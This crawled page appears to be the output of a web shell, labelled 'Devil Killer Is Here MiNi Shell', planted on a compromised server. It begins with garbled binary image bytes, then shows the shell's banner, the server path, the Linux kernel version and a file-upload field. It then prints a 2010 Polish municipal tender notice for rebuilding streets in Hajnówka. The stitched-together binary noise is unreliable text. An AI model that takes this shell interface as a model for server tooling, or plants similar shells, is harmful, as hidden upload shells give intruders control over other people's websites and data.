JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100315/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100315/71090-N-2010.html

<p class="kh_header"><b>Hajnówka: Przebudowa ul. Targowa, Bagienna i Z. Nałkowskiej w Hajnówce</b><br>
<b>Numer ogłoszenia: 71090 - 2010; data zamieszczenia: 15.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Hajnówka , ul. A. Zina 1, 17-200 Hajnówka, woj. podlaskie, tel. 085 6822875, faks 085 6822994.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.hajnowka.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.hajnowka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ul. Targowa, Bagienna i Z. Nałkowskiej w Hajnówce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia  jest  realizacja  zadania  pn: Przebudowa ul. Targowa, Bagienna i 
Z. Nałkowskiej w Hajnówce  polegająca  na:

    1. Przebudowie ul. Targowa w Hajnówce o długości 300 m i szerokości  jezdni  5,5m.
    2. Przebudowie   ul. Bagienna  w  Hajnówce o dł. 322 m i szerokości  jezdni  5,0 m.
    3. Przebudowie ul. Z. Nałkowskiej w Hajnówce o długości 412 m i szerokości jezdni 5,0 m.

    Zamawiający  dopuszcza  możliwość  składania  ofert  częściowych: 

    Zadanie  Nr 1:
    Dostawa  wraz  z  transportem  i  rozładunkiem  na  placu  budowy  nw  materiałów  drogowych: 
    1. Krawężnik  betonowy  typ  lekki           -       2 036szt.
    2. Krawężnik  betonowy  typ  ciężki          -       78 szt.
    3. Płytka chodnikowa 35x35x5 cm            -       540 szt.
    4. Obrzeża betonowe 20x 6 cm                  -       90 mb
    5. Kostka betonowa gr. 6 cm                      -      18 m2

    Zadanie  Nr 2:
    Wykonanie  nawierzchni  utwardzonej  jezdni  z  mieszanki  mineralno - bitumicznej  asfaltowej:
    1. ul. Targowa :    
        -  nawierzchnia  z  mieszanek  mineralno - bitumicznych  asfaltowych  o  gr. 4 cm  (warstwa  
           wiążąca) na  podbudowie  z  kruszyw  naturalnych  na łącznej  powierzchni  1734,40 m2 wraz  
           z  mechanicznym  zagęszczeniem  górnych  warstw ( 40 cm )  podbudowy.
        -  nawierzchnia  z  mieszanek  mineralno - bitumicznych  asfaltowych  o  gr. 4 cm  (warstwa  
           ścieralna) .
    2. ul. Bagienna:  
        -  nawierzchnia  z  mieszanek  mineralno - bitumicznych  asfaltowych  o  gr. 5 cm  (warstwa  
           ścieralna)  na  podbudowie  z  kruszyw  naturalnych  na łącznej  powierzchni  1624,22 m2  
                   wraz  z  mechanicznym  zagęszczeniem  górnych  warstw ( 40 cm )  podbudowy.
    3. ul. Z. Nałkowskiej :  
        -  nawierzchnia  z  mieszanek  mineralno - bitumicznych  asfaltowych  o  gr. 4 cm  (warstwa  
           wiążąca)  84,70 m2.
        -  nawierzchnia  z  mieszanek  mineralno - bitumicznych  asfaltowych  o  gr. 4 cm  (warstwa  
           ścieralna) na podbudowie z kruszyw naturalnych na łącznej powierzchni 84,70 m2.
        -  nawierzchnia  z  mieszanek  mineralno - bitumicznych  asfaltowych  o  gr. 5 cm  (warstwa  
           ścieralna)  1936,75 m2.

Zadanie  Nr 3:
Wykonanie robót ziemnych i podbudowy :   
     1. ul. Z. Nałkowskiej: 
        -  roboty ziemne wykonane koparkami z transportem urobku na odległość 5km  - 1279,90m3
     -  wykonanie i zagęszczenie warstwy odsączającej, grubość warstwy po zagęszczeniu 15cm -  
         2019,74 m2
     -  warstwy podbudowy z kruszywa naturalnego, grubość warstwy po zagęszczeniu 25cm -  
         2019,74 m2

Zadanie Nr 4:
Wykonanie kanalizacji deszczowej :
1. ul. Targowa :
- kanałów  z  rur  PCV  o  średnicy  zewnętrznej  O 315 mm   -   242 mb,
- studzienki kanalizacyjne systemowe  O 425 mm  - 6 studnie
- studzienek  ściekowych  ulicznych  betonowych  z  osadnikiem  O 500 mm   -   13 szt.
- kanał (przykanaliki) z rur PCV o średnicy zewnętrznej  O 200 mm   -   51,90 mb,
- osadnik  O 1500 mm - 1 sztuk,
2.ul. Bagienna : 
- kanałów  z  rur  PCV  o  średnicy  zewnętrznej  O 200 mm   -   179 mb,
- studzienki kanalizacyjne systemowe  O 425 mm  - 5 studnie
- studzienek  ściekowych  ulicznych  betonowych  z  osadnikiem  O 500 mm   -   12 szt.
- kanał (przykanaliki) z rur PCV o średnicy zewnętrznej  O 160 mm   -   48 mb,
3.ul. Z. Nałkowskiej : 
- kanałów z rur PCV o średnicy zewnętrznej O 250 mm   -   12 mb,
- studzienki kanalizacyjne systemowe  O 425 mm  - 1 studnie
- studzienek  ściekowych  ulicznych  betonowych  z  osadnikiem  O 500 mm   -   2 szt.
  - kanał (przykanaliki) z rur PCV o średnicy zewnętrznej  O 200 mm   -   6,50 mb,
  - studnie rewizyjne z kręgów betonowych O 1000 mm  - 1 studnie
  - przecisk o średnicy nominalnej do O 300 mm - 10 m,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.52-0, 45.11.12.00-0, 45.23.21.30-2, 45.23.31.61-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  nie  żąda  wniesienia  wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie  precyzuje  w  tym  zakresie  żadnych  wymagań, których  spełnienie 
Wykonawca  będzie  zobowiązany  wykazać.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest  do wykazani , że w okresie  ostatnich  pięciu lat przed upływem  terminu składania  ofert, a jeżeli okres  prowadzenia działalności jest krótszy  - w tym okresie  wykonał  co najmniej dwie inwestycje polegające na budowie lub przebudowie  dróg swoim zakresem obejmujące w szczególności  wykonanie podbudowy  z kruszyw łamanych lub naturalnych - o wartości  nie  mniejszej  niż    250.000 brutto każda, oraz wykonał  co najmniej dwie inwestycje polegające  wykonaniu kanalizacji deszczowej lub sanitarnej  o wartości  nie  mniejszej  niż    150.000 brutto każda. Do wskazanych robót wykonawca zobowiązany jest  przedstawić dokumenty potwierdzające , że roboty  zostały wykonane  zgodnie z zasadami  sztuki budowlanej  i prawidłowo ukończone - Dotyczy Zadania Nr 2 i 3.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie  precyzuje  w  tym  zakresie  żadnych  wymagań, których  spełnienie 
Wykonawca  będzie  zobowiązany  wykazać.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  winien  dysponować  osobami, które  będą  uczestniczyć  w  wykonywaniu 
    zamówienia  legitymujące  się  kwalifikacjami  zawodowymi, doświadczeniem                  
    i  wykształceniem  odpowiednimi  do  stanowisk  jakie  im  zostaną  powierzone  -                      
    zgodnie  z  poniższym  wykazem :
                -  Kierownik  Budowy   -  1 osoba : 
                                                         - uprawnienia  budowlane  do  kierowania  robotami    
                                                            w  specjalności  drogowej  lub  odpowiadające  im 
                                                            uprawnienia  wydane  na  podstawie  wcześniej 
                                                            obowiązujących  przepisów,
                                                         -  doświadczenie  zawodowe - co  najmniej  5 lat  od 
                                                             uzyskania  uprawnień,
                -  Kierownik  Robót  w  branży  drogowej   -  1 osoba : 
                                                         - uprawnienia  budowlane  do  kierowania  robotami    
                                                            w  specjalności  drogowej  lub  odpowiadające  im 
                                                            uprawnienia  wydane  na  podstawie  wcześniej 
                                                            obowiązujących  przepisów,
                                                         -  doświadczenie  zawodowe - co  najmniej  5 lat  od 
                                                             uzyskania  uprawnień,                                               
                -  Kierownik  Robót  w  branży  sanitarnej   -  1 osoba : 
                                                         - uprawnienia  budowlane  do  kierowania  robotami    
                                                            w  specjalności  sanitarnej  lub  odpowiadające  im 
                                                            uprawnienia  wydane  na  podstawie  wcześniej 
                                                            obowiązujących  przepisów,
                                                         -  doświadczenie  zawodowe - co  najmniej  5 lat  od 
                                                             uzyskania  uprawnień,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie  precyzuje  w  tym  zakresie  żadnych  wymagań, których  spełnienie 
Wykonawca  będzie  zobowiązany  wykazać.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Gwarancja (ponad 36 miesięcy) - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. W  trakcie  realizacji  umowy  postanowienia  umowy  mogą  ulec  zmianom, jeżeli  zmiany   
     będą  korzystne  dla  Zamawiającego  lub  konieczność  wprowadzenia  zmian  wynikać  będzie   
     z  okoliczności, których  nie  można  było  przewidzieć  w  chwili  zawarcia  umowy.
2. Zamawiający  przewiduje  możliwość  zmiany  postanowień  zawartej  umowy  w  przypadku:
     a. zmiany  regulacji  prawnych  obowiązujących  w  chwili  zawarcia  umowy,
     b. zmiany  danych  dotyczących  Zamawiającego  lub  Wykonawcy,
     c. zmiany  Podwykonawcy  robót,
     d. zmiany  przez  Wykonawcę  formy  wniesienia  zabezpieczenia  należytego  wykonania  
         umowy,
     e. zmiany  osób  kierujących  robotami  budowlanymi,
     f. zmiany  terminu  i  zakresu  wykonania  zamówienia, które  zaistniały  w  trakcie  realizacji  
         przedmiotu  umowy  z  przyczyn  niezależnych  od  Zamawiającego  i  od  Wykonawcy  tj.:  
        - wystąpienia  niekorzystnych  warunków  atmosferycznych, geologicznych, hydrologicznych,            
        - wystąpienia  odkryć  archeologicznych, 
        - natrafienia  na  niewybuchy  i  niewypały, 
        - wystąpienia  klęsk  żywiołowych (powódź, pożar itp.),  
3. Warunki  ewentualnych  zmian  -  stosownie  do  czasu  trwania  okoliczności  będących  
     podstawą zmiany.
4. Zmiana  postanowień  zawartej  umowy  w  przypadkach  określonych  w  pkt. 2  nie  może  
    prowadzić  do  zwiększenia  wynagrodzenia  Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.hajnowka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Hajnówce, ul. Aleksego Zina 1, 17-200 Hajnówka
tel. (85) 682 2875, 682 6443
fax. (85) 682 2994.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2010 godzina 09:00, miejsce: Urząd  Miasta  Hajnówka, 17 - 200 Hajnówka, ul. Aleksego  Zina  1,
                                                 pok. Nr  219  -  sekretariat  Urzędu..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa  wraz  z  transportem  i  rozładunkiem  na  placu  budowy  nw  materiałów  drogowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Krawężnik  betonowy  typ  lekki           -       2 036szt.
    2. Krawężnik  betonowy  typ  ciężki          -       78 szt.
    3. Płytka chodnikowa 35x35x5 cm            -       540 szt.
    4. Obrzeża betonowe 20x 6 cm                  -       90 mb
    5. Kostka betonowa gr. 6 cm                      -      18 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.52-0, 45.11.12.00-0, 45.23.21.30-2, 45.23.31.61-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja (ponad 36 miesięcy) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie  nawierzchni  utwardzonej  jezdni  z  mieszanki  mineralno - bitumicznej  asfaltowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. ul. Targowa :    
        -  nawierzchnia  z  mieszanek  mineralno - bitumicznych  asfaltowych  o  gr. 4 cm  (warstwa  
           wiążąca) na  podbudowie  z  kruszyw  naturalnych  na łącznej  powierzchni  1734,40 m2 wraz  
           z  mechanicznym  zagęszczeniem  górnych  warstw ( 40 cm )  podbudowy.
        -  nawierzchnia  z  mieszanek  mineralno - bitumicznych  asfaltowych  o  gr. 4 cm  (warstwa  
           ścieralna) .
    2. ul. Bagienna:  
        -  nawierzchnia  z  mieszanek  mineralno - bitumicznych  asfaltowych  o  gr. 5 cm  (warstwa  
           ścieralna)  na  podbudowie  z  kruszyw  naturalnych  na łącznej  powierzchni  1624,22 m2  
                   wraz  z  mechanicznym  zagęszczeniem  górnych  warstw ( 40 cm )  podbudowy.
    3. ul. Z. Nałkowskiej :  
        -  nawierzchnia  z  mieszanek  mineralno - bitumicznych  asfaltowych  o  gr. 4 cm  (warstwa  
           wiążąca)  84,70 m2.
        -  nawierzchnia  z  mieszanek  mineralno - bitumicznych  asfaltowych  o  gr. 4 cm  (warstwa  
           ścieralna) na podbudowie z kruszyw naturalnych na łącznej powierzchni 84,70 m2.
        -  nawierzchnia  z  mieszanek  mineralno - bitumicznych  asfaltowych  o  gr. 5 cm  (warstwa  
           ścieralna)  1936,75 m2..</p></li>
